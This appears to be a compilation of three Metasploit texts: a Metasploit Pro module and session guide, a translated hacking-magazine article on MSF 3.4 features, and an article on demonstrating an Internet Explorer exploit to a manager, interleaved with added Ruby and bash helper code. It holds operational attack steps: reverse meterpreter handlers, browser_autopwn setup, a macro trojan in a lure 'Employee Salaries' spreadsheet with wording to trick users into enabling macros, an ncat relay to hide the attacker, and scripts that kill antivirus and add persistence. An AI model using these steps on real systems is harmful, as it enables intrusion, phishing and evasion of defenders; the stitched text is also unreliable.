The page for a single vulnerability shows a list of exploits that can be run against the host. Click the Use button to open the module settings page.

General module settings

Each module has its own set of options that can be customized to suit your needs. There are too many to list them all here, but the options below are commonly used to configure modules:

  • Payload Type: Determines the type of payload the exploit delivers to the target. Select one of the following payload types:
    • Command: A payload that executes a command. It can be used to run commands on the remote computer.
    • Meterpreter: An advanced payload that provides a command line from which you can run commands and load extensions.
  • Connection Type: Determines how Metasploit connects to the target. Select one of the following connection types:
    • Automatic: Uses a bind connection if NAT was detected; otherwise, a reverse connection is used.
    • Bind: Uses a bind connection, which is useful when the target is not behind a firewall or NAT gateway.
    • Reverse: Uses a reverse connection, which is useful when your system cannot initiate a connection to the target.
  • LHOST: Specifies the local host address.
  • LPORT: Specifies the port to use for reverse connections.
  • RHOST: Specifies the target address.
  • RPORT: Specifies the remote port you want to attack.
  • Target Settings: Specifies the target operating system and version.
  • Exploit Timeout: Defines the timeout, in minutes.

Post-exploitation and data collection

Any exploit that succeeds against a vulnerability opens a session that you can use to extract information from the target. The real impact of the attack depends on the data you can obtain from the target (such as password hashes and system files) and on how you use that data to gain access to additional systems.

To view a list of open sessions, select the Sessions tab. Click on a session ID to view the post-exploitation tasks that can be run against the host.

To collect data from an exploited system, click the Collect button.

The list of all open sessions shows the type of data that can be collected.

Clearing sessions

When you're done with an open session, you can clean it up before logging out. This removes any evidence that may have been left on the system. To clean up a session, go to Sessions and click the Clean up button.

When the clean up sessions page appears, select the sessions you want to close, then click the Clean up Sessions button.

Create a report

At the end of the penetration test, you can generate a report. Metasploit provides several types of reports that can be used to compile test results and consolidate data. Each report organizes its findings into appropriate sections, displays charts and graphs for statistical data, and summarizes key findings.
To learn more about reports, see the Metasploit Pro documentation.

Additional Resources

We have covered a lot of information. If you would like to explore certain topics in more detail, see the Metasploit Pro documentation.

Now that you know how to perform common tasks in Metasploit Pro, check out the other options you can use:

  • Do you want to automate tasks? Check out task chains.
  • Interested in brute force attacks?
  • Want to start a security awareness program? See how to build a social engineering campaign.
  • Prefer the command line?
  • Interested in the Framework?

Born 7 years ago, MSF subsequently transformed from a simple framework for writing working exploits, first into a kind of “Swiss Army knife”, and now into a whole workshop for conducting pentests, including everything necessary, from information gathering to advanced post-exploitation methods. It is not for nothing that MSF is one of the five most used tools. And the good news is that MSF continues to grow and develop! In which direction, you will find out from this article.

Initially, the article was supposed to describe the possibilities of automating actions in MSF, but after analyzing people’s knowledge about the framework, it was decided to talk about its more or less advanced built-in capabilities, and their automation will be discussed along the way. This is so that people don't reinvent the wheel :).

By the way, about knowledge. It is not surprising that there are not many of them, since there are no comprehensive articles/books about Metasploit even in English. So the main sources of information are foreign blogs and personal research. Plus, I’m glad that Ruby is a simple thing, and you can do something useful using other people’s examples.
But to the point! Everything described concerns the latest version – MSF 3.4.2.

GUI is back!

For those who don't like the console or are too lazy to deal with MSF commands, there is a GTK-based GUI shell. More precisely, there was one, since it was abandoned in version 3.3. If I'm not mistaken, the same thing happened to msfweb. That is, you can still use them, but they had stability problems even before, and now... eh!

But while this article was being prepared, something good happened: a new GUI shell. It has changed both outside and inside. Specifically, it is written in Java, so it is cross-platform, and it talks to MSF over the XML-RPC interface, which means it can be used remotely.

Launching the GUI is done in two stages: start msfrpcd, then connect to it with msfgui. Under *nix, once msfgui is running, you can simply click “start new msfrpcd”.

Win version:

  1. Launch the Cygwin console
  2. cd /msf3
  3. msfrpcd -S -U username -P password, where -S disables SSL and the username/password are of your own choosing
  4. Run msfgui.jar, which is stored in %MSF%\msf3\data\gui, either by double-clicking it or from the (non-Cygwin) console: java -jar msfgui.jar

In msfgui we enter login/pass, port, IP and connect.

Something is missing, even compared to the old gui. For example, accessing the console or viewing logs. But you can work, especially if you need to quickly go through plugins, modules, surf on someone else’s computer, etc.

Collection of information

You should know that MSF works with a database to store information and exchange it between its modules. And this direction is actively developing.

For starters, the only fully supported database is PostgreSQL. SQLite was abandoned because of performance/scalability issues, and things did not go smoothly with MySQL either. In general, installing Postgres should not cause problems; the driver for interacting with it is built into MSF.

Under Windows: install it, then set the password for the postgres user and the port.

Via pgAdmin: connect to the local server, create another “Login Role” user (msf_user), and create a database under “Databases” (msf_db). There you can also configure the SQL server itself, make it “safer”, and even crawl through the MSF tables.

msf> db_driver postgresql
msf> db_connect msf_user:<password>@<db_host>:5432/msf_db

The db_create command no longer works directly: you can only connect to an existing database, and if you have sufficient rights (like the postgres user), the database will be created automatically. Otherwise, create the database in Postgres manually.

This is not so scary, because you can use workspaces. There is one database and the tables are shared, but the modules exchange and add information only within the current workspace. Once you try it, you will see that db_workspace is what helps here.

Let's take a look at the commands a little:

  • db_service – displays information about ports/services, scanned either by modules, by the built-in nmap, or imported from third-party programs. db_autopwn with the -p parameter (by port) works from this data;
  • db_notes – “notes”, such as the OS version obtained from Nmap, or some “details” obtained by WMap. Sadly, db_autopwn does not seem to look at db_notes when selecting an exploit;
  • db_vulns – vulnerabilities found either by MSF modules (WMap) or imported from Nessus (OpenVAS) or Nexpose. db_autopwn with the -x parameter (by vulnerabilities) works from this data.

For example, let’s scan the host with nmap and the results will go into our database:

msf> db_nmap -PN -sV 192.168.0.101

The result from MSF's own port scanner module will be similar, and the data will also end up in the database. But to identify service versions you need to use other modules (all auxiliary modules in the scanner section whose names end in “version”, for example scanner/imap/imap_version).

msf> use scanner/portscan/tcp
msf> set RHOSTS 192.168.0.101
msf> set PORTS 1-1000
msf> run -j

To automate the last actions, and indeed any actions in MSF, you can use the so-called resource files. Essentially, these are ordinary text files with a sequential listing of commands for MSF. For example, let’s create a resource for quickly launching a “server” for reverse meterpreter. To do this, put the following commands into the file (metrevhandl.rc):

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.0.102
exploit -j
back

We run our script using “resource”:

msf> resource metrevhandl.rc

As you can see, it is very convenient. But that is not all. The best part is that you can write Ruby code in these scripts, which allows us, for example, to establish relationships between individual MSF modules.

By the way, ~/.msf3/msfconsole.rc is a script that is run automatically when msfconsole starts. It is a very convenient place to put the database connection, for example.

Let's go...

WMAP. WMAP is an attempt to tailor MSF for web applications and somehow automate the whole thing. The WMAP project is still in its early stages and is not performing particularly well, especially compared to its competitors. It is unlikely that it will develop, at least in its current form, and the reason is that Rapid7 has begun to heavily fund the open source w3af framework, which is tailored for the web, so we can expect a merger of the internals or functionality of MSF and w3af. But still a small example (requires a connection to the database):

1. Load the wmap plugin:

msf> load db_wmap

2. Adding a victim:

msf> wmap_targets -a http://www.example.com/

3. View and launch modules against our victim:

msf> wmap_run -t
msf> wmap_run -e

The results are stored in the database and are available through db_vulns, db_notes.

Some modules require settings to be configured. This can be done using the setg command. WMAP also has a spider (wmap_crawler) and the ability to interact with a proxy (wmap_proxy).

In addition, for those who like to torture databases with all kinds of injections, I advise you to look at the MSF module scanner/http/sqlmap. It is a port of the tool of the same name, SQLmap, and a powerful thing, by the way :). Information about the tool can be found on its creators' website.

db_autopwn

db_autopwn in MSF has acquired a couple of useful parameters:

  • -R – specifies the minimum rank of the exploits that will be used;
  • -m – sets a regexp for selecting exploits.

For example:

msf> db_autopwn -t -p -m windows -R excellent

will display a list of only the best exploits for standard Win services.

By the way, since version 3.3.1 you can work with Nexpose directly from MSF and immediately autopwn based on the identified vulnerabilities.

1. Load the plugin and connect to Nexpose:

msf> load nexpose
msf> nexpose_connect msf_user:<password>@<nexpose_host>

2. We launch only the best exploits for the vulnerabilities found:

msf> nexpose_scan -R excellent -x 192.168.0.101

Browser_autopwn

If the previous tool was aimed at exploits for ordinary (server-side) services, this one, as the name suggests, is aimed at client-side exploits targeting victims' browsers.

In fact, this module brings up an HTTP server and loads all the browser exploits on it. When a victim visits our server, the module detects the browser version and OS and then launches the appropriate exploit. So far, the main feature of the module is the accurate detection of the browser/OS version: both server-side and client-side (JavaScript) detection are used, so the module definitely cannot be fooled by substituting a different User-Agent.

Of the available exploits, the ones for old-school browser versions work well, but the best part is that you can simply add your own exploits, and that is already powerful. The result is a free exploit pack.

In future versions they promise to add exploit obfuscation (so that antivirus software does not flag them) and payload selection.

For example, let's create a server with backconnect for shells 192.168.0.102:

msf> use server/browser_autopwn
msf> set LHOST 192.168.0.102
msf> set URI index.php
msf> exploit -j

VBA

In the EasyHack section I already wrote about creating Trojans using MSF, but sending exe files is very bad. Users these days have become timid and don’t open everything they can get their hands on, and there are also warnings from Windows. It’s much less painful to use some office files:

msfpayload windows/shell_bind_tcp LPORT=5555 V > macros.vba

Next, we create, for example, an Excel document with the terrible name “Employee Salaries.” Then we open the resulting VBA, shove the macro text (MACRO CODE) into the document macro (Tools -> Macro -> VB Editor), and at the end of the document - our “load” (PAYLOAD DATA). You can add some calculations for beauty to the beginning of the document. Since macros are disabled by default (from the OfficeXP version, as far as I know), then a line like “Attention! Working with the database is possible only when macros are enabled. To enable them, go to “Tools –> Options –> Security –> Macro Protection –> Low” and restart the document”, you can force the user to enable macros. As a result, the shell is on port 5555.

Payloads

The choice of payload for an exploit is in fact an important matter. But there are a lot of them in MSF, so I will go through them briefly (mostly the Win* ones) to give a general understanding. Firstly, there is a general division by OS, as well as by software and loadable interpreters (ruby, perl).

General division by description:

  • Those marked “Inline” are “whole” shellcodes. They are large, so they do not always fit into an exploit;
  • “Stager” – payloads split into parts. The exploit carries only a small shellcode, mainly for establishing a connection; the rest is loaded over that connection;
  • “Ord” – “sharpened” payloads. Small in size, but tied to static addresses in the memory of a system DLL;
  • “Bind” – open a port and wait for a connection;
  • “Reverse” – backconnect shell;
  • “Findport” – the socket through which the exploit worked is found, and the shell is then opened through it. The search is done by port number;
  • “Findtag” – similar to the previous one, only the socket is identified by listening on all available ones for the arrival of a 4-byte tag from the attacker;
  • “Exec, Download_exec, Up_exec” – shellcode to launch a command, or to download/upload a file and launch it;
  • “VNC” – launches a VNC server on the victim;
  • “dllinjection” – loads DLLs into process memory. There are two types of DLL injection;
  • “metsvc” – downloads the whole meterpreter to the victim and registers it as a service;
  • “PassiveX” – our shell acts as an ActiveX element;
  • “NoNX” – shellcodes that bypass the DEP memory protection mechanism;
  • “DNS” – those that can work by host name rather than by IP;
  • “HTTPS” is a shell that communicates using the encrypted HTTPS protocol (sorry, no proxy support).
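As an added example (not code from the article), here is a small Ruby function that splits a payload name such as windows/meterpreter/reverse_http into the categories just listed (inline vs. stager, bind vs. reverse vs. findport/findtag, transport) and reports which of the handler options from the module settings list earlier on this page it needs (LHOST/LPORT for a reverse payload, RHOST for a bind one). The architecture token list and the handling of cmd/<subplatform>/... names are assumptions covering the common cases.

```ruby
# Added example (not from the article): classify a Metasploit payload by its
# name.  Assumptions: the arch token list below covers the common cases, and
# "cmd/<subplatform>/..." names carry a sub-platform instead of an arch.

# CPU architecture segments that may follow the platform (assumed list).
ARCH_TOKENS = %w[x86 x64 armle armbe aarch64 mipsle mipsbe mips64 ppc ppc64 sparc].freeze

# How the payload obtains its channel: "reverse_" (backconnect), "bind_"
# (open a port on the victim), "findport"/"findtag" (reuse the exploit socket).
CONNECTION_RE = /(?:\A|_)(reverse|bind|find_?port|find_?tag)(?:_|\z)/

def parse_payload_name(name)
  segs = name.to_s.split('/')
  if segs.size < 2 || segs.any?(&:empty?)
    raise ArgumentError, "not a payload name: #{name.inspect}"
  end

  platform = segs.shift
  subplatform = nil
  arch = nil
  if platform == 'cmd'
    subplatform = segs.shift            # e.g. cmd/unix/reverse_perl
  elsif ARCH_TOKENS.include?(segs.first)
    arch = segs.shift                   # e.g. windows/x64/meterpreter/reverse_tcp
  end

  # One remaining segment: an "Inline" (single) payload carrying the whole
  # shellcode.  Two segments: a "Stager" that fetches the named stage.
  case segs.size
  when 1
    staged, stage, tail = false, nil, segs[0]
  when 2
    staged, stage, tail = true, segs[0], segs[1]
  else
    raise ArgumentError, "unexpected structure: #{name.inspect}"
  end

  m = CONNECTION_RE.match(tail)
  connection = m ? m[1].delete('_').to_sym : :none  # :reverse, :bind, :findport, :findtag, :none
  # What the payload gives you: the stage name, or the part of a single
  # payload's name before the connection keyword ("shell" in shell_bind_tcp).
  kind = staged ? stage : (m ? tail[0...m.begin(0)] : tail)
  kind = nil if kind.empty?
  # Transport after the keyword: tcp, http, https, tcp_allports, perl ...
  transport = (m && %i[reverse bind].include?(connection)) ? tail[m.end(0)..-1] : nil
  transport = nil if transport && transport.empty?

  handler_options =
    case connection
    when :reverse then %w[LHOST LPORT]   # the handler listens, the payload calls back
    when :bind    then %w[RHOST]         # the payload listens on the target
    else []                              # reuses the exploit socket or needs no channel
    end

  { name: name, platform: platform, subplatform: subplatform, arch: arch,
    staged: staged, kind: kind, connection: connection, transport: transport,
    encrypted: transport == 'https', handler_options: handler_options }
end

# One-line human-readable summary, handy when reviewing a handler .rc file.
def describe_payload(name)
  p = parse_payload_name(name)
  form = p[:staged] ? "staged #{p[:kind]}" : "inline #{p[:kind] || 'payload'}"
  chan = case p[:connection]
         when :none then 'no network channel'
         else "#{p[:connection]} over #{p[:transport] || 'the exploit socket'}"
         end
  opts = p[:handler_options].empty? ? '' : " (handler needs #{p[:handler_options].join('/')})"
  "#{name}: #{form}, #{chan}#{opts}"
end

if $PROGRAM_NAME == __FILE__
  %w[windows/meterpreter/reverse_http windows/shell_bind_tcp
     windows/x64/meterpreter/reverse_https cmd/unix/reverse_perl windows/exec]
    .each { |n| puts describe_payload(n) }
end
```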

I will dwell a little on PassiveX, since it is very good.
The idea is that our shell is registered as an ActiveX element, and communication goes through a hidden instance of IE over HTTP. This is actually cool, especially when you are working inside a corporate network where everyone sits behind NAT and a common firewall that only allows HTTP traffic from the corporate proxy server. In that case no other payload will help, especially if you do not know the proxy settings. And here all the proxy settings and the authentication for it (if any) are already configured in IE.

Let's create the payload and a listener for it (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> use exploit/multi/handler
msf> exploit -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

Moreover, if before PassiveX only worked under IE6, now everything is fine with IE7/8.

Next, about ordinary shells. A regular shell is, of course, good, but if you used meterpreter, then you will want to return to it.
And now we have this opportunity. Let's assume our victim (192.168.0.101) already has a regular bind shell installed on port 5678.

Let's connect to it from MSF:

msf> use exploit/multi/handler
msf> exploit -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

I would like to say that with the next command we turn an ordinary shell into a meterpreter, but no luck. MSF simply loads the meterpreter backconnect and, having launched it, creates another session (another connection is created). Although that's not bad either. But for everything to work, we need to set the global values ​​of our host (where the reverse connects), and then “update” the session (let’s assume it’s “1”):

msf> setg LHOST 192.168.0.102
msf> setg LPORT 6666
msf> sessions -u 1

As a result, we get rid of a lot of stress and limitations of a regular shell.

By the way, about meterpreter. They have been trying to port it to other platforms (Linux, Mac OS) for a long time, but so far not everything is going smoothly. Still, there is good news: meterpreter has been ported to PHP in some form! “In some form”, because not all functions can be implemented in PHP, but the main ones are already available. So you can upload it to a server you have compromised and play around with such a cool shell.

Now a word about our own “safety”. Currently, most MSF modules do not support proxies, especially for the working payloads. And we do not want to be found out :). So let's recall the old-school trick: port forwarding.

Let's assume our server with MSF, waiting for shells to connect back, is located at “192.168.0.103:5555”. Then on a decoy server we start netcat on port 80:

ncat --sh-exec "ncat 192.168.0.103 5555" -l 80 --keep-open

And in the payloads we specify the IP (or DNS name) and port of the decoy server.
By the way, netcat supports SSL, so you can encrypt traffic if the shell itself does not allow this.
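As an added example (not from the article), here is the same port-forwarding idea in Ruby, written so it can be exercised on the loopback interface: a TcpRelay that accepts on one port and copies bytes to and from a target address, plus a relay_roundtrip helper in which an echo server stands in for the MSF listener. It shows that the far end only ever sees the relay as its peer, which is also why, when reading connection logs on the defending side, the source address may be an intermediate hop rather than the origin.

```ruby
require 'socket'

# Added example (not from the article): a small TCP relay doing what the ncat
# line above does.  Each connection accepted on the listen port is opened
# onward to target_host:target_port and bytes are copied in both directions.
class TcpRelay
  attr_reader :port

  def initialize(target_host, target_port, listen_host: '127.0.0.1', listen_port: 0)
    @target = [target_host, target_port]
    @server = TCPServer.new(listen_host, listen_port)   # port 0 = pick a free port
    @port = @server.addr[1]
    @workers = []
  end

  def start
    @acceptor = Thread.new do
      loop do
        begin
          client = @server.accept
        rescue IOError, Errno::EBADF                    # listener closed by #stop
          break
        end
        @workers << Thread.new(client) { |c| relay(c) }
      end
    end
    self
  end

  def stop
    @server.close
    @acceptor.join if @acceptor
    @workers.each(&:join)
  end

  private

  # Copy from one socket to the other until EOF, then half-close the
  # destination so the EOF propagates to the far side as well.
  def pump(from, to)
    loop { to.write(from.readpartial(4096)) }
  rescue EOFError, IOError, SystemCallError
    nil
  ensure
    begin
      to.close_write
    rescue IOError, SystemCallError
      nil
    end
  end

  def relay(client)
    upstream = TCPSocket.new(*@target)
    [Thread.new { pump(client, upstream) },
     Thread.new { pump(upstream, client) }].each(&:join)
  rescue SystemCallError => e
    warn "relay: could not reach #{@target.join(':')}: #{e.message}"
  ensure
    [client, upstream].each { |s| s.close if s && !s.closed? }
  end
end

# Loopback demonstration: an echo server stands in for the machine that is
# really waiting for the connection; the client only ever talks to the relay.
def relay_roundtrip(message)
  echo = TCPServer.new('127.0.0.1', 0)
  echo_thread = Thread.new do
    conn = echo.accept
    begin
      loop { conn.write(conn.readpartial(4096)) }
    rescue EOFError, IOError, SystemCallError
      nil
    ensure
      conn.close
    end
  end

  relay = TcpRelay.new('127.0.0.1', echo.addr[1]).start
  client = TCPSocket.new('127.0.0.1', relay.port)
  client.write(message)
  client.close_write             # our EOF travels relay -> echo -> relay -> us
  reply = client.read.b          # everything the echo server sent back, as bytes
  client.close
  relay.stop
  echo_thread.join
  echo.close
  reply
end

puts relay_roundtrip('ping') if $PROGRAM_NAME == __FILE__
```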

Post-exploitation

Yes, now let's move on to the most delicious part: post-exploitation and meterpreter. I hope you are familiar with meterpreter, because I have no desire to explain how good it is (it leaves almost no traces behind it and works in chroot) and how functional (built-in hack tools, registry and file system modification, migration between processes and tokens, routing) :).

Let's assume that we have gained access to one of the computers (192.168.146.129) on the corporate network and we (192.168.0.102) want to build on our success - scan the subnet and do something else.

Add a route (subnet, its mask, and the session to route through) in msfconsole:

msf> route add 192.168.146.0 255.255.255.0 1

Unfortunately, nmap did not want to use this route; apparently the integration is not that deep yet. But ordinary modules, exploits and scanners can be used without any special settings to develop the attack (see figure): MSF takes care of all the routing.

Since certain hosts may have limited access to the external network (where we are), you can use port forwarding on an already compromised victim to communicate with them; fortunately, meterpreter can do this:

meterpreter> portfwd add -l 8008 -p 2222 -r 192.168.0.101

Now we write in the payloads of the exploits LHOST=192.168.146.129, LPORT=8008, and everything will be great.

Meterpreter has a wonderful feature: automating actions through Ruby scripts. This is really cool. You can view the existing scripts in msf3\scripts\meterpreter, or, while in a session, type run and press Tab twice (for those not in the know :)). You can run scripts either manually via the run command, or by specifying the AutoRunScript or InitialAutoRunScript variable when configuring the payload/server. The second variable is executed before the shell is launched, the first after.

There are already a lot of scripts included in the package; the most standard ones:

  • winenum – quickly collects all information about the system, from network settings to installed software and hashes;
  • persistence, metsvc – register meterpreter for autostart in the registry or as a service;
  • getcountermeasure – disables the firewall and can kill the processes of various antivirus products and firewalls.

Instead of a conclusion

In this article I tried to describe something new (at least for Russian-language sources) and at the same time cover all stages of hacking, so I hope it will be useful to you. In addition, a couple of brilliant ideas were born that just need to be implemented, and a couple of nasty bugs in MSF turned up which, I hope, will be fixed by the time this issue is released. In general, creating is wonderful!

A few tips:

  • Autocompletion works great in msfconsole by pressing Tab, and all commands support help via the “-h” parameter.
  • To interrupt the execution of a command, press Ctrl+C; to send it to the background, Ctrl+Z.
  • Copying text in Cygwin is done with the left/right mouse button; pasting is Shift+Insert.
  • Under Windows, the msfcli, msfpayload, etc. interfaces are accessed via the Cygwin console. But it is advisable to test them thoroughly, since not all functions may work correctly.

PAVEL TROITSKY

Vulnerability Research Using the Metasploit Framework

It's never too late to learn, and teaching others is a pleasant experience... From this article you can learn how simply and clearly you can demonstrate the operation of most vulnerabilities using the Metasploit Framework.

Everything that happens in life is for the better... One Saturday morning I had to work bravely. Agree, it’s not the most pleasant activity, especially on your day off. But the situation can be looked at from the other side.

After a few hours of morning work, when I was freed up and in a state of sleep on the move, I no longer felt the urge to go home. I floated down the corridor, where there was a soothing silence compared to the noisy everyday life. I don’t remember how curiosity probably kicked in; hearing from afar the characteristic incessant sounds of quickly pressing keys on a keyboard, I changed course on autopilot and moored in the next department.

I love watching people working with passion. It turned out that my namesake and colleague was sitting behind his two monitors and deciding something. I landed softly in one of the empty chairs, turned on the kettle and waited.

Pashok came back to life and noticed me only when the kettle boiled and loudly clicked its thermal switch throughout the room. Apparently, the fact that he didn’t put the kettle on worked.

Seeing me, he quickly made himself some coffee, sat back down in his seat, and was clearly delighted that he could pour out his soul to me during a tea party and find understanding. And so it turned out. He was solving one interesting problem that his boss had assigned him, with microcontrollers, while also thinking about another task for which he did not have enough time.

The second task was more interesting than the first, I will try to describe it to you, and then offer the solution we came up with.

Is closed source the enemy of the people?

It is no secret that the technical department and its management look askance at those who use closed-source programs, which also contain many vulnerabilities. When the company's management understands the problem, that's good. The technical department is given the green light, and the entire organization switches to solutions that are more correct and safe for the company.

But there are other cases when management, relying on the opinions of friends and acquaintances, pretends to understand, but in fact it does not.

For example, not everyone appreciates the advantages of new versions of Linux, OpenOffice or the Mozilla Firefox browser (compared to their closed and not always stable counterparts: Windows, MSOffice or IE).

People are inert, accustomed to something and don’t want to change anything. The fish rots from the head - there are cases when management does not allow the technical department to access their computers (especially laptops), being not only a source of security violations, but also the first target for the machinations of competitors.

The goal of the task was to restore authority to the technical department, give an introductory lecture for staff and implement decisions on installation and transition to more secure Open Source analogues, citing this not by one’s own desire, but by the order of the management above the technical department.

The task seems clear, if you have many years of experience, you were probably able to see in it something intersecting from your life or similar. Let's look at the case of a decision where cunning benefits the common cause. If you have more interesting solutions, write to the magazine’s forum and we’ll discuss it!

Solution

How to proceed? Since almost everyone uses the Global Network, and it poses a significant threat to any department, we will set a goal - to wean users from using IE.

If we turn to the classics, there are not many different approaches to solving problems:

  • if you check the browser you are using and disable IE access to the network on the proxy server, then this will not be the best solution, and the administrator can be classified as a “maniac”;
  • if you delete IE for all users, then it will be an “idiot” administrator, and the problem will also not be solved;
  • if you try to harm users running IE, it will be a “fascist” administrator - he will not achieve success either, since he will spend all his energy fighting the investigation.

The most correct thing is to use a trick and fight the cause. Imagine, if all users consciously refuse some solution, then what would be the point in the business world for a manufacturer to promote this solution?

The most suitable type of administrator for our idea is the “technical bandit”.

We will study the various nuances of how browsers work and the vulnerabilities that exist in them, install special programs that demonstrate hidden capabilities that arise due to errors, and thereby force management to make the right decision.

Check your system for vulnerabilities

It is an obvious fact that any large program has bugs. Almost everyone understands this, including management. That is why various scanners for checking networks and individual hosts were invented long ago. But not everyone understands the specifics of how they work.

Although Nessus, Shadow Security Scanner, nmap, XSpider and others are convenient and have proven themselves to a degree, you should rely on their results only with an understanding of what is actually happening.

For example, what about the case where the vulnerable code is executed on the user's side and is not triggered by an external scanner at all? It is no secret that many people, having scanned their computer (or server) and found no open ports or vulnerable services, mistakenly conclude that their systems are in perfect order.

We will try to demonstrate this mistake using the IE browser as the example and the Metasploit Framework as the tool.

Action plan. A little theory

When you receive various security mailings or visit websites on similar topics, you periodically come across information about various vulnerabilities: such-and-such a vulnerability allows code to be delivered to the client and executed on its side; such-and-such a vulnerability simply crashes the application.

In theory, it works like this: you visit site XXX, and instead a terminal window opens in which the command “format c:” is run.

The example is exaggerated, but if you find it hard to believe, by the end of the article you will be able to conduct a similar experiment in your own home.

The Metasploit Project

This is a project created by Metasploit LLC, containing useful information for people who develop signature databases for intrusion detection systems (IDS), as well as for those who research vulnerabilities and how they work.

The purpose of the resource is to collect various information about known exploits and vulnerabilities along with the codes that implement them, so that this information is available to security administrators and developers.

The site contains several sections containing useful information.

We will need the Framework section (see Figure 1), dedicated to the platform on which our plan can be implemented.

Look for Download below and download framework-3.2.tar.gz.

Installing the Metasploit Framework

Previously, the program was only available through the CLI (command line interface), and therefore was known only in narrow circles.

GUI (graphical interface) support has recently been added, making the program more attractive to less experienced users (especially given the availability of a Windows version). Whether this is good or bad is hard to say. We will choose the Linux version with the GUI.

The operating system is the recently released Fedora 10. Of course, it is not without problems. Most likely, in six months to a year, minor problems will be resolved, and it will become a working platform for many administrators, but for now it is very suitable for our experiments. If we take earlier versions (Fedora 8, 9), then there should be no fundamental differences in the installation.

For the graphical interface to work, you must install the Ruby language and libraries:

  • ruby-1.8.6.287-2.fc10.i386.rpm;
  • ruby-libs-1.8.6.287-2.fc10.i386.rpm;
  • ruby-gtk2-0.18.0-2.fc10.i386.rpm;
  • ruby-libglade2-0.18.0-2.fc10.i386.rpm;
  • ruby-atk-0.18.0-2.fc10.i386.rpm;
  • ruby-cairo-1.8.0-1.fc10.i386.rpm;
  • ruby-gdkpixbuf2-0.18.0-2.fc10.i386.rpm;
  • ruby-glib2-0.18.0-2.fc10.i386.rpm;
  • ruby-gnome2-0.18.0-2.fc10.i386.rpm;
  • ruby-gnomecanvas2-0.18.0-2.fc10.i386.rpm;
  • ruby-libart2-0.18.0-2.fc10.i386.rpm;
  • ruby-pango-0.18.0-2.fc10.i386.rpm.

This can be done either manually using the commands:

rpm -ihv *.rpm

or via:

yum install...

in which case it is enough to specify only the first four packages; the rest will be resolved as dependencies and installed automatically.

The next step is to unpack the downloaded framework-3.2.tar.gz archive into a directory, go into it and run the msfgui file with administrator rights.

Administrator rights (root) are needed so that the program can open listening sockets on any port it needs (for example, TCP port 80).

Starting the program

Now, choosing a vulnerability (there are many of them in the Metasploit Framework database), we can try to set up a server that generates code to be delivered to the client and executed on its side. Then we will check whether the client is vulnerable. The first machine at hand was chosen as the vulnerable one, namely one with Windows 2003 and IE 6.0 (see Fig. 5). By the way, some administrators, without troubling themselves, often look something up on the Internet directly from the server console and have no intention of installing an alternative browser, citing the fact that such improvised Internet sessions from the server room are rare. Let me note that one case is enough to compromise a server!


From there the situation is simple: the main task is to lure the victim, or the all-knowing boss, to our computer. On the Internet this is solved socially, that is, in a roundabout way: for example, by placing various banners or redirecting via pop-up windows from already infected sites. This often happens on dubious sites (free downloads of commercial programs, porn sites, etc.) that invite you to click on a banner.

On a local network, being its administrators, we can redirect the request at the gateway to wherever we need, and then show the boss that a perfectly harmless-looking site can work wonders with his computer (run other applications, copy his documents, etc.), even if he has an antivirus running.

Of course, the whole range of possible actions depends on your imagination, and the purpose of the article is only to show the direction and what is possible. Therefore, we will limit ourselves to a single vulnerability as an example and launch a harmless program on the victim's computer, for example “Calculator”. It is no secret that, in order to write this article honestly, I had to sort through vulnerabilities for half an hour to find one that worked in this configuration.

The vulnerability described in Microsoft Security Bulletin MS06-067 was chosen; select this vulnerability in the program database (see Fig. 6).

We specify port 8081 and a command to run on a machine with a vulnerable browser “c:\windows\system32\calc.exe” (see Fig. 8).

Note: if you want to register port 80, and you are running an httpd server, then do not forget to stop it, for example, with the command:

# service httpd stop

or:

# /etc/rc.d/init.d/httpd stop

Otherwise, it is not clear which of the two programs should listen on the port for incoming connections. For this purpose, the example uses port 8081, which will obviously be free.
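A check for exactly this conflict, added here as an example and not part of the original article: before pointing the listener at a port, probe whether anything already accepts connections on it and, if so, move to the next free port. It assumes bash (for the /dev/tcp pseudo-device) and a loopback interface; the port numbers are the ones used above.

```bash
#!/bin/bash
# Added example: make sure the port we hand to the Metasploit GUI is not
# already taken by httpd or another daemon. Uses bash's /dev/tcp device,
# so it needs no ss, netstat or nc on the box.

# port_in_use PORT -> exit status 0 if something accepts TCP connections
# on 127.0.0.1:PORT, 1 if the connection is refused (port free).
port_in_use() {
  local port="$1"
  # The redirection in the subshell performs a TCP connect; a failed
  # connect makes the subshell exit non-zero and prints to stderr only.
  if (exec 3<>"/dev/tcp/127.0.0.1/${port}") 2>/dev/null; then
    return 0
  fi
  return 1
}

# pick_listen_port PREFERRED -> prints PREFERRED if it is free, otherwise
# the first free port above it, so a running httpd on 80 is never clobbered.
pick_listen_port() {
  local port="$1"
  while port_in_use "$port"; do
    port=$((port + 1))
  done
  echo "$port"
}

# Usage: the article's preferred port is 8081; fall back upward if busy.
chosen=$(pick_listen_port 8081)
echo "listen on TCP port ${chosen}"
```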

After we confirm the settings (see Fig. 9), a new task appears in the list of running jobs (see Fig. 10).

The victim's machine is shown in Figure 11.

Conclusion

Of course, this example is trivial, and in order to impress others or your boss, it is better to adapt it to the specifics of your situation. We are built so that movement (change) attracts our attention, so for people who do not really understand how a buffer overflow occurs, it is better to run an archiver with suitable options instead of a calculator, so that there is animation in the window: for example, a percentage counter “running” as files from the “My Documents\Confidential” folder are compressed. Then it will be easier to argue that this site is aimed at collecting information from your boss's computer, and your arguments will carry more weight: since the site launched an archiver rather than some calculator, the problem is much more serious. Although I hope that most readers will smile once more when reading these lines.

This article and example can also be used for educational purposes. Why not make it a guide for teachers of security courses at universities, for conducting demonstrations or laboratory work? It will be far more interesting for students to carry out such a lab than to compute results whose meaning is not always clear.

If you're wondering if it's time for you to update/change your system or browser, then you're on the right track!

  1. Robachevsky A. M. UNIX operating system. – St. Petersburg: BHV-Petersburg, 2002, ISBN 5-8206-0030-4.
  2. The website of The Metasploit Project, which contains information and exploits on various vulnerabilities, is http://metasploit.com.
  3. Microsoft Security Bulletin Vulnerability MS06-067 – http://www.microsoft.com/technet/security/Bulletin/MS06-067.mspx.
